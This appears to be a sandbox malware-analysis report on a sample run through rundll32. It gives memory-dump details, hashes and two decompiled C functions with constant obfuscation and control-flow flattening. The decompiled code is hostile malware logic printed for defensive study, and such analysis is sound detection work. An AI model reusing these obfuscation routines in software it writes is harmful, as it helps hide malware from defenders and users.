                                                                                                                      0x002b4248
                                                                                                                      0x002b4250
                                                                                                                      0x002b4258
                                                                                                                      0x002b4262
                                                                                                                      0x002b4266
                                                                                                                      0x002b426b
                                                                                                                      0x002b4273
                                                                                                                      0x002b4280
                                                                                                                      0x002b4284
                                                                                                                      0x002b4289
                                                                                                                      0x002b4291
                                                                                                                      0x002b4299
                                                                                                                      0x002b42a1
                                                                                                                      0x002b42a6
                                                                                                                      0x002b42ae
                                                                                                                      0x002b42b6
                                                                                                                      0x002b42be
                                                                                                                      0x002b42c3
                                                                                                                      0x002b42cb
                                                                                                                      0x002b42d8
                                                                                                                      0x002b42dc
                                                                                                                      0x002b42e4
                                                                                                                      0x002b42ec
                                                                                                                      0x002b42f4
                                                                                                                      0x002b42fc
                                                                                                                      0x002b4304
                                                                                                                      0x002b430c
                                                                                                                      0x002b4314
                                                                                                                      0x002b431c
                                                                                                                      0x002b4324
                                                                                                                      0x002b432c
                                                                                                                      0x002b4339
                                                                                                                      0x002b433d
                                                                                                                      0x002b4342
                                                                                                                      0x002b434a
                                                                                                                      0x002b4357
                                                                                                                      0x002b4360
                                                                                                                      0x002b4364
                                                                                                                      0x002b436c
                                                                                                                      0x002b436c
                                                                                                                      0x002b4376
                                                                                                                      0x002b4466
                                                                                                                      0x002b440a
                                                                                                                      0x002b440a
                                                                                                                      0x00000000
                                                                                                                      0x002b440a
                                                                                                                      0x002b4382
                                                                                                                      0x002b442b
                                                                                                                      0x002b4437
                                                                                                                      0x002b443f
                                                                                                                      0x002b4440
                                                                                                                      0x002b444c
                                                                                                                      0x002b4451
                                                                                                                      0x002b4454
                                                                                                                      0x00000000
                                                                                                                      0x002b4454
                                                                                                                      0x002b438a
                                                                                                                      0x002b4405
                                                                                                                      0x00000000
                                                                                                                      0x002b4405
                                                                                                                      0x002b4392
                                                                                                                      0x002b43e7
                                                                                                                      0x002b43ee
                                                                                                                      0x002b43f5
                                                                                                                      0x00000000
                                                                                                                      0x002b43f5
                                                                                                                      0x002b439a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b43c2
                                                                                                                      0x00000000
                                                                                                                      0x002b43d9
                                                                                                                      0x002b446d
                                                                                                                      0x002b4471
                                                                                                                      0x002b447d
                                                                                                                      0x002b4482
                                                                                                                      0x002b4487
                                                                                                                      0x002b44af
                                                                                                                      0x002b44b5
                                                                                                                      0x002b44c4
                                                                                                                      0x002b44dc
                                                                                                                      0x002b44e1
                                                                                                                      0x002b44e4
                                                                                                                      0x002b44e9
                                                                                                                      0x002b44e9
                                                                                                                      0x002b44e9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L\Z$/|$Tb
                                                                                                                      • API String ID: 0-3338791969
                                                                                                                      • Opcode ID: eab0be4a832b0909a5edeba7593981d0aefe50b8bdf36d0fd20895e3e84a7d3b
                                                                                                                      • Instruction ID: 5efa360e1faeda82c092d61fd407dcbfe3015cd9fce659e1fd3c23649aa77102
                                                                                                                      • Opcode Fuzzy Hash: eab0be4a832b0909a5edeba7593981d0aefe50b8bdf36d0fd20895e3e84a7d3b
                                                                                                                      • Instruction Fuzzy Hash: 3AD100714183818FC768DF61C48A65FFBE0FBC4748F208A1DF2A696261D7B58A59CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BF93D Relevance: 4.0, Strings: 3, Instructions: 239COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002BF93D() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t255;
				void* _t258;
				intOrPtr _t259;
				intOrPtr _t261;
				void* _t266;
				intOrPtr _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int* _t315;

				_t315 =  &_v1140;
				_v1056 = 0x7fa207;
				_v1052 = 0x3c49bf;
				_t266 = 0x35a8362;
				_t302 = 0;
				_v1048 = 0;
				_v1044 = 0;
				_v1060 = 0xe96fdd;
				_v1060 = _v1060 + 0xffff4dc5;
				_v1060 = _v1060 ^ 0x00e8fae7;
				_v1084 = 0x95aacc;
				_t303 = 0x76;
				_v1084 = _v1084 / _t303;
				_v1084 = _v1084 ^ 0x00004e07;
				_v1132 = 0x8ad3c0;
				_t304 = 0x3b;
				_v1132 = _v1132 / _t304;
				_t305 = 5;
				_v1132 = _v1132 / _t305;
				_t306 = 0x2e;
				_v1132 = _v1132 / _t306;
				_v1132 = _v1132 ^ 0x0002326f;
				_v1136 = 0x5025c5;
				_v1136 = _v1136 | 0xd1709035;
				_v1136 = _v1136 + 0xfffff598;
				_v1136 = _v1136 | 0xced027f9;
				_v1136 = _v1136 ^ 0xdffed43e;
				_v1076 = 0x8b6e07;
				_v1076 = _v1076 ^ 0x693ed631;
				_v1076 = _v1076 ^ 0x69bbe5bc;
				_v1096 = 0x201396;
				_v1096 = _v1096 ^ 0x88694b71;
				_v1096 = _v1096 + 0xffff467e;
				_v1096 = _v1096 ^ 0x884e23ab;
				_v1068 = 0x6d8c34;
				_v1068 = _v1068 ^ 0x91e2fcbf;
				_v1068 = _v1068 ^ 0x9185a139;
				_v1128 = 0x807b8c;
				_v1128 = _v1128 | 0x3609e9e3;
				_v1128 = _v1128 + 0xffff6ddf;
				_v1128 = _v1128 + 0xffffdf1a;
				_v1128 = _v1128 ^ 0x3687a3ab;
				_v1104 = 0xe6d4b9;
				_v1104 = _v1104 >> 0xd;
				_t307 = 0x48;
				_v1104 = _v1104 / _t307;
				_v1104 = _v1104 * 0x6c;
				_v1104 = _v1104 ^ 0x0006818d;
				_v1064 = 0xd65a00;
				_v1064 = _v1064 + 0x372a;
				_v1064 = _v1064 ^ 0x00dea864;
				_v1088 = 0x4d0087;
				_v1088 = _v1088 + 0xffffb4c7;
				_v1088 = _v1088 ^ 0x0a5aafbb;
				_v1088 = _v1088 ^ 0x0a1526df;
				_v1092 = 0x9c5ab3;
				_t308 = 0x3c;
				_v1092 = _v1092 / _t308;
				_v1092 = _v1092 >> 1;
				_v1092 = _v1092 ^ 0x000c3f19;
				_v1140 = 0x5b7912;
				_v1140 = _v1140 + 0xffff68b5;
				_t309 = 0x6d;
				_v1140 = _v1140 * 0xe;
				_v1140 = _v1140 >> 1;
				_v1140 = _v1140 ^ 0x02711af4;
				_v1120 = 0xf0336c;
				_v1120 = _v1120 + 0x850d;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 / _t309;
				_v1120 = _v1120 ^ 0x00151fd7;
				_v1112 = 0x1d5cd4;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 | 0x8feadd76;
				_v1112 = _v1112 << 0x10;
				_v1112 = _v1112 ^ 0xff743f21;
				_v1116 = 0x1a947a;
				_v1116 = _v1116 + 0x75f0;
				_v1116 = _v1116 << 0xa;
				_t310 = 0x5a;
				_v1116 = _v1116 * 0x6e;
				_v1116 = _v1116 ^ 0x79e60e9e;
				_v1124 = 0xbb349e;
				_v1124 = _v1124 / _t310;
				_v1124 = _v1124 << 8;
				_t311 = 0x54;
				_v1124 = _v1124 / _t311;
				_v1124 = _v1124 ^ 0x000c08c5;
				_v1080 = 0xb1ec11;
				_v1080 = _v1080 | 0x4ad04b34;
				_v1080 = _v1080 ^ 0x4af1877a;
				_v1072 = 0x6450ea;
				_v1072 = _v1072 ^ 0x5bd0ca6d;
				_v1072 = _v1072 ^ 0x5bbfa4d9;
				_v1100 = 0x193680;
				_v1100 = _v1100 + 0xffff84f1;
				_t312 = 0x39;
				_v1100 = _v1100 / _t312;
				_v1100 = _v1100 ^ 0x185ca7c1;
				_v1100 = _v1100 ^ 0x1855126a;
				_v1108 = 0xe40e26;
				_v1108 = _v1108 + 0xffff805f;
				_v1108 = _v1108 << 4;
				_v1108 = _v1108 ^ 0x0e3caf6d;
				do {
					while(_t266 != 0x35a8362) {
						if(_t266 == 0x706ecca) {
							E002CE498(_v1072, _v1100, _v1108,  &_v1040);
						} else {
							if(_t266 == 0xd630330) {
								_push( &_v520);
								_push( &_v1040);
								_push(_v1080);
								_t255 = E002B8D95(_v1116, _v1124, __eflags);
								_t315 =  &(_t315[3]);
								__eflags = _t255;
								_t302 =  !=  ? 1 : _t302;
								_t266 = 0x706ecca;
								continue;
							} else {
								if(_t266 == 0xdb8f695) {
									E002D12A8(_t266, _v1060, __eflags, _v1084, _v1132,  &_v520);
									_t315 =  &(_t315[3]);
									_t266 = 0xe8d55c7;
									continue;
								} else {
									_t322 = _t266 - 0xe8d55c7;
									if(_t266 != 0xe8d55c7) {
										goto L10;
									} else {
										_push(_v1068);
										_push(_v1096);
										_push(0x2b10cc);
										_t258 = E002BAB66(_v1136, _v1076, _t322);
										_t259 =  *0x2d520c; // 0x0
										_t261 =  *0x2d520c; // 0x0
										E002BE7CE(_t258, _t322, _v1128, _t261 + 8, _v1136, _v1104, _v1064, _v1088, _v1092, _t259 + 0x220);
										E002BAE03(_v1140, _v1120, _v1112, _t258);
										_t315 =  &(_t315[0xd]);
										_t266 = 0xd630330;
										continue;
									}
								}
							}
						}
						L13:
						return _t302;
					}
					_t266 = 0xdb8f695;
					L10:
					__eflags = _t266 - 0x3cedcca;
				} while (__eflags != 0);
				goto L13;
			}















































                                                                                                                      0x002bf93d
                                                                                                                      0x002bf943
                                                                                                                      0x002bf94d
                                                                                                                      0x002bf955
                                                                                                                      0x002bf95e
                                                                                                                      0x002bf960
                                                                                                                      0x002bf964
                                                                                                                      0x002bf968
                                                                                                                      0x002bf970
                                                                                                                      0x002bf978
                                                                                                                      0x002bf980
                                                                                                                      0x002bf98e
                                                                                                                      0x002bf993
                                                                                                                      0x002bf999
                                                                                                                      0x002bf9a1
                                                                                                                      0x002bf9ad
                                                                                                                      0x002bf9b2
                                                                                                                      0x002bf9bc
                                                                                                                      0x002bf9c1
                                                                                                                      0x002bf9cb
                                                                                                                      0x002bf9d0
                                                                                                                      0x002bf9d6
                                                                                                                      0x002bf9de
                                                                                                                      0x002bf9e6
                                                                                                                      0x002bf9ee
                                                                                                                      0x002bf9f6
                                                                                                                      0x002bf9fe
                                                                                                                      0x002bfa06
                                                                                                                      0x002bfa0e
                                                                                                                      0x002bfa16
                                                                                                                      0x002bfa1e
                                                                                                                      0x002bfa26
                                                                                                                      0x002bfa2e
                                                                                                                      0x002bfa36
                                                                                                                      0x002bfa3e
                                                                                                                      0x002bfa46
                                                                                                                      0x002bfa4e
                                                                                                                      0x002bfa56
                                                                                                                      0x002bfa5e
                                                                                                                      0x002bfa66
                                                                                                                      0x002bfa6e
                                                                                                                      0x002bfa76
                                                                                                                      0x002bfa7e
                                                                                                                      0x002bfa86
                                                                                                                      0x002bfa8f
                                                                                                                      0x002bfa92
                                                                                                                      0x002bfa9b
                                                                                                                      0x002bfa9f
                                                                                                                      0x002bfaa7
                                                                                                                      0x002bfaaf
                                                                                                                      0x002bfab7
                                                                                                                      0x002bfabf
                                                                                                                      0x002bfac7
                                                                                                                      0x002bfacf
                                                                                                                      0x002bfad7
                                                                                                                      0x002bfadf
                                                                                                                      0x002bfaf4
                                                                                                                      0x002bfaf9
                                                                                                                      0x002bfaff
                                                                                                                      0x002bfb08
                                                                                                                      0x002bfb10
                                                                                                                      0x002bfb18
                                                                                                                      0x002bfb25
                                                                                                                      0x002bfb28
                                                                                                                      0x002bfb2c
                                                                                                                      0x002bfb30
                                                                                                                      0x002bfb38
                                                                                                                      0x002bfb40
                                                                                                                      0x002bfb48
                                                                                                                      0x002bfb55
                                                                                                                      0x002bfb59
                                                                                                                      0x002bfb61
                                                                                                                      0x002bfb69
                                                                                                                      0x002bfb6e
                                                                                                                      0x002bfb76
                                                                                                                      0x002bfb7b
                                                                                                                      0x002bfb83
                                                                                                                      0x002bfb8b
                                                                                                                      0x002bfb93
                                                                                                                      0x002bfb9d
                                                                                                                      0x002bfba0
                                                                                                                      0x002bfba4
                                                                                                                      0x002bfbac
                                                                                                                      0x002bfbbc
                                                                                                                      0x002bfbc0
                                                                                                                      0x002bfbc9
                                                                                                                      0x002bfbce
                                                                                                                      0x002bfbd4
                                                                                                                      0x002bfbdc
                                                                                                                      0x002bfbe4
                                                                                                                      0x002bfbec
                                                                                                                      0x002bfbf4
                                                                                                                      0x002bfbfc
                                                                                                                      0x002bfc04
                                                                                                                      0x002bfc0c
                                                                                                                      0x002bfc14
                                                                                                                      0x002bfc20
                                                                                                                      0x002bfc23
                                                                                                                      0x002bfc27
                                                                                                                      0x002bfc2f
                                                                                                                      0x002bfc37
                                                                                                                      0x002bfc47
                                                                                                                      0x002bfc4f
                                                                                                                      0x002bfc54
                                                                                                                      0x002bfc5c
                                                                                                                      0x002bfc5c
                                                                                                                      0x002bfc6e
                                                                                                                      0x002bfd78
                                                                                                                      0x002bfc74
                                                                                                                      0x002bfc7a
                                                                                                                      0x002bfd2b
                                                                                                                      0x002bfd30
                                                                                                                      0x002bfd31
                                                                                                                      0x002bfd3d
                                                                                                                      0x002bfd44
                                                                                                                      0x002bfd48
                                                                                                                      0x002bfd4a
                                                                                                                      0x002bfd4d
                                                                                                                      0x00000000
                                                                                                                      0x002bfc80
                                                                                                                      0x002bfc82
                                                                                                                      0x002bfd15
                                                                                                                      0x002bfd1a
                                                                                                                      0x002bfd1d
                                                                                                                      0x00000000
                                                                                                                      0x002bfc84
                                                                                                                      0x002bfc84
                                                                                                                      0x002bfc86
                                                                                                                      0x00000000
                                                                                                                      0x002bfc8c
                                                                                                                      0x002bfc8c
                                                                                                                      0x002bfc90
                                                                                                                      0x002bfc9c
                                                                                                                      0x002bfca1
                                                                                                                      0x002bfcab
                                                                                                                      0x002bfcc8
                                                                                                                      0x002bfcdd
                                                                                                                      0x002bfcef
                                                                                                                      0x002bfcf4
                                                                                                                      0x002bfcf7
                                                                                                                      0x00000000
                                                                                                                      0x002bfcf7
                                                                                                                      0x002bfc86
                                                                                                                      0x002bfc82
                                                                                                                      0x002bfc7a
                                                                                                                      0x002bfd7f
                                                                                                                      0x002bfd8b
                                                                                                                      0x002bfd8b
                                                                                                                      0x002bfd57
                                                                                                                      0x002bfd59
                                                                                                                      0x002bfd59
                                                                                                                      0x002bfd59
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *7$Pd$6
                                                                                                                      • API String ID: 0-2172486832
                                                                                                                      • Opcode ID: 6cfd90a064c61de5b50df33eb4b54f46b68187338c982b2e59ca1998eb5ad06f
                                                                                                                      • Instruction ID: e46143a6a0990992418d4f74f91cea610b2b4fab01d1d1f6ec345458094ef3a3
                                                                                                                      • Opcode Fuzzy Hash: 6cfd90a064c61de5b50df33eb4b54f46b68187338c982b2e59ca1998eb5ad06f
                                                                                                                      • Instruction Fuzzy Hash: 73B143B15183409FD354CF26C98A94FFBE1FBC8758F408A2EF69686260D7B18909CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B8D95 Relevance: 3.9, Strings: 3, Instructions: 194COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E002B8D95(void* __ecx, void* __edx, void* __eflags) {
				void* _t231;
				signed int _t261;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				void* _t269;
				intOrPtr* _t290;
				void* _t291;

				_t290 = _t291 - 0x6c;
				_push( *((intOrPtr*)(_t290 + 0x7c)));
				_push( *((intOrPtr*)(_t290 + 0x78)));
				_push( *((intOrPtr*)(_t290 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t231);
				 *(_t290 + 8) =  *(_t290 + 8) & 0x00000000;
				 *_t290 = 0x81872b;
				 *((intOrPtr*)(_t290 + 4)) = 0xdf4fac;
				 *(_t290 + 0x2c) = 0x807aaf;
				_t265 = 0x3e;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) * 0x66;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) >> 0xc;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) ^ 0x0003330f;
				 *(_t290 + 0x50) = 0x6f2162;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) >> 4;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) * 0x62;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) + 0xffffa9e2;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) ^ 0x02a8505a;
				 *(_t290 + 0x58) = 0xe574ec;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0x326d;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9da0d68a;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0xbde6;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9d4627b9;
				 *(_t290 + 0x20) = 0xd3956a;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) * 0x24;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) ^ 0x1dc1e5a2;
				 *(_t290 + 0x14) = 0xfcd290;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) >> 0x10;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) ^ 0x00095bca;
				 *(_t290 + 0x64) = 0x85109;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x78e3fbb1;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) + 0xffffa60f;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x3bc8e61c;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) ^ 0x7bee7ea1;
				 *(_t290 + 0x3c) = 0x71f5e0;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) >> 3;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) + 0xebfe;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) ^ 0x0002c43f;
				 *(_t290 + 0x28) = 0x899f0e;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) + 0x8a6f;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) ^ 0x0089e2c7;
				 *(_t290 + 0x54) = 0x38c331;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t265;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x1d97b6ad;
				_t266 = 0x30;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t266;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x0098c8d2;
				 *(_t290 + 0x38) = 0xd05f1;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) >> 7;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) << 0xf;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) ^ 0x0d051a45;
				 *(_t290 + 0x30) = 0x1cfed4;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) >> 0x10;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc4190834;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc41fa725;
				 *(_t290 + 0x40) = 0x1c7373;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) * 0x75;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) << 0xc;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) ^ 0x0c3b1071;
				 *(_t290 + 0x18) = 0x2a4c72;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) >> 0xe;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0x00012640;
				 *(_t290 + 0x4c) = 0xadab42;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) + 0xc082;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0x0f040eb7;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) | 0xc54ebe7a;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0xcfe19c3b;
				 *(_t290 + 0x5c) = 0x1c041c;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0x881f;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0xa114;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) << 2;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) ^ 0x007200ac;
				 *(_t290 + 0x44) = 0x9cf7da;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) | 0xc9a894cc;
				_t267 = 3;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) * 0xa;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) ^ 0xe16343df;
				 *(_t290 + 0x60) = 0x461ba6;
				_t268 = 0xd;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) / _t267;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) + 0x5831;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab0fd2ba;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab16638d;
				 *(_t290 + 0x68) = 0x8d460c;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) * 0x3f;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) + 0x2d22;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) / _t268;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) ^ 0x02a3ee27;
				 *(_t290 + 0x34) = 0x2e04ca;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) | 0xfffff3f9;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xfffa6071;
				 *(_t290 + 0x10) = 0xbf0768;
				 *(_t290 + 0x10) =  *(_t290 + 0x10) + 0xffff288c;
				 *(_t290 + 0x10) =  *(_t290 + 0x10) ^ 0x00be6359;
				 *(_t290 + 0xc) = 0xd072fa;
				 *(_t290 + 0xc) =  *(_t290 + 0xc) << 1;
				 *(_t290 + 0xc) =  *(_t290 + 0xc) ^ 0x01aa1a0e;
				 *(_t290 + 0x1c) = 0x9f8a7b;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb0eca93;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb998053;
				 *(_t290 + 0x24) = 0xd784f2;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) << 5;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) ^ 0x1afc882d;
				 *(_t290 + 0x48) = 0xfdbd11;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0xbb0d2ead;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) >> 0xa;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) + 0xffffcd0b;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0x002ef0f8;
				_push( *(_t290 + 0x3c));
				_push( *(_t290 + 0x64));
				_push( *(_t290 + 0x14));
				_push( *(_t290 + 0x20));
				_t269 = 0x1e;
				E002D1310(_t269, _t290 - 0x20);
				E002D1310(0x208, _t290 - 0x228,  *(_t290 + 0x28),  *(_t290 + 0x54),  *(_t290 + 0x38),  *(_t290 + 0x30));
				E002D1310(0x208, _t290 - 0x430,  *(_t290 + 0x40),  *(_t290 + 0x18),  *(_t290 + 0x4c),  *(_t290 + 0x5c));
				E002C08A0( *((intOrPtr*)(_t290 + 0x7c)),  *(_t290 + 0x44),  *(_t290 + 0x60), _t290 - 0x228,  *(_t290 + 0x68));
				E002C08A0( *((intOrPtr*)(_t290 + 0x78)),  *(_t290 + 0x34),  *(_t290 + 0x10), _t290 - 0x430,  *(_t290 + 0xc));
				 *(_t290 - 0x1c) =  *(_t290 + 0x2c);
				 *((intOrPtr*)(_t290 - 0x18)) = _t290 - 0x228;
				 *((intOrPtr*)(_t290 - 0x14)) = _t290 - 0x430;
				 *((short*)(_t290 - 0x10)) =  *(_t290 + 0x58) |  *(_t290 + 0x50) | 0x00000410;
				_t261 = E002CE2C5( *(_t290 + 0x1c),  *(_t290 + 0x24),  *(_t290 + 0x48), _t290 - 0x20);
				asm("sbb eax, eax");
				return  ~_t261 + 1;
			}












                                                                                                                      0x002b8d96
                                                                                                                      0x002b8da0
                                                                                                                      0x002b8da3
                                                                                                                      0x002b8da6
                                                                                                                      0x002b8da9
                                                                                                                      0x002b8daa
                                                                                                                      0x002b8dab
                                                                                                                      0x002b8db0
                                                                                                                      0x002b8db6
                                                                                                                      0x002b8dbd
                                                                                                                      0x002b8dc4
                                                                                                                      0x002b8dd1
                                                                                                                      0x002b8dd4
                                                                                                                      0x002b8dd7
                                                                                                                      0x002b8ddb
                                                                                                                      0x002b8de2
                                                                                                                      0x002b8de9
                                                                                                                      0x002b8df1
                                                                                                                      0x002b8df4
                                                                                                                      0x002b8dfb
                                                                                                                      0x002b8e02
                                                                                                                      0x002b8e09
                                                                                                                      0x002b8e10
                                                                                                                      0x002b8e17
                                                                                                                      0x002b8e1e
                                                                                                                      0x002b8e25
                                                                                                                      0x002b8e30
                                                                                                                      0x002b8e33
                                                                                                                      0x002b8e3a
                                                                                                                      0x002b8e41
                                                                                                                      0x002b8e45
                                                                                                                      0x002b8e4c
                                                                                                                      0x002b8e53
                                                                                                                      0x002b8e5a
                                                                                                                      0x002b8e61
                                                                                                                      0x002b8e68
                                                                                                                      0x002b8e6f
                                                                                                                      0x002b8e76
                                                                                                                      0x002b8e7a
                                                                                                                      0x002b8e81
                                                                                                                      0x002b8e88
                                                                                                                      0x002b8e8f
                                                                                                                      0x002b8e96
                                                                                                                      0x002b8e9d
                                                                                                                      0x002b8eab
                                                                                                                      0x002b8eae
                                                                                                                      0x002b8eb8
                                                                                                                      0x002b8ebb
                                                                                                                      0x002b8ebe
                                                                                                                      0x002b8ec5
                                                                                                                      0x002b8ecc
                                                                                                                      0x002b8ed0
                                                                                                                      0x002b8ed4
                                                                                                                      0x002b8edb
                                                                                                                      0x002b8ee2
                                                                                                                      0x002b8ee6
                                                                                                                      0x002b8eed
                                                                                                                      0x002b8ef4
                                                                                                                      0x002b8eff
                                                                                                                      0x002b8f02
                                                                                                                      0x002b8f06
                                                                                                                      0x002b8f0d
                                                                                                                      0x002b8f14
                                                                                                                      0x002b8f18
                                                                                                                      0x002b8f1f
                                                                                                                      0x002b8f26
                                                                                                                      0x002b8f2d
                                                                                                                      0x002b8f34
                                                                                                                      0x002b8f3b
                                                                                                                      0x002b8f42
                                                                                                                      0x002b8f49
                                                                                                                      0x002b8f52
                                                                                                                      0x002b8f59
                                                                                                                      0x002b8f5d
                                                                                                                      0x002b8f64
                                                                                                                      0x002b8f6b
                                                                                                                      0x002b8f78
                                                                                                                      0x002b8f7b
                                                                                                                      0x002b8f7e
                                                                                                                      0x002b8f85
                                                                                                                      0x002b8f91
                                                                                                                      0x002b8f92
                                                                                                                      0x002b8f97
                                                                                                                      0x002b8f9e
                                                                                                                      0x002b8fa5
                                                                                                                      0x002b8fac
                                                                                                                      0x002b8fb7
                                                                                                                      0x002b8fba
                                                                                                                      0x002b8fc9
                                                                                                                      0x002b8fcc
                                                                                                                      0x002b8fd3
                                                                                                                      0x002b8fda
                                                                                                                      0x002b8fe1
                                                                                                                      0x002b8fe8
                                                                                                                      0x002b8fef
                                                                                                                      0x002b8ff6
                                                                                                                      0x002b8ffd
                                                                                                                      0x002b9004
                                                                                                                      0x002b9007
                                                                                                                      0x002b900e
                                                                                                                      0x002b9015
                                                                                                                      0x002b901c
                                                                                                                      0x002b9023
                                                                                                                      0x002b902a
                                                                                                                      0x002b902e
                                                                                                                      0x002b9035
                                                                                                                      0x002b903c
                                                                                                                      0x002b9043
                                                                                                                      0x002b9047
                                                                                                                      0x002b904e
                                                                                                                      0x002b9055
                                                                                                                      0x002b9058
                                                                                                                      0x002b905b
                                                                                                                      0x002b905e
                                                                                                                      0x002b9063
                                                                                                                      0x002b9064
                                                                                                                      0x002b9080
                                                                                                                      0x002b909c
                                                                                                                      0x002b90b7
                                                                                                                      0x002b90cf
                                                                                                                      0x002b90d7
                                                                                                                      0x002b90e0
                                                                                                                      0x002b90e9
                                                                                                                      0x002b90f7
                                                                                                                      0x002b9108
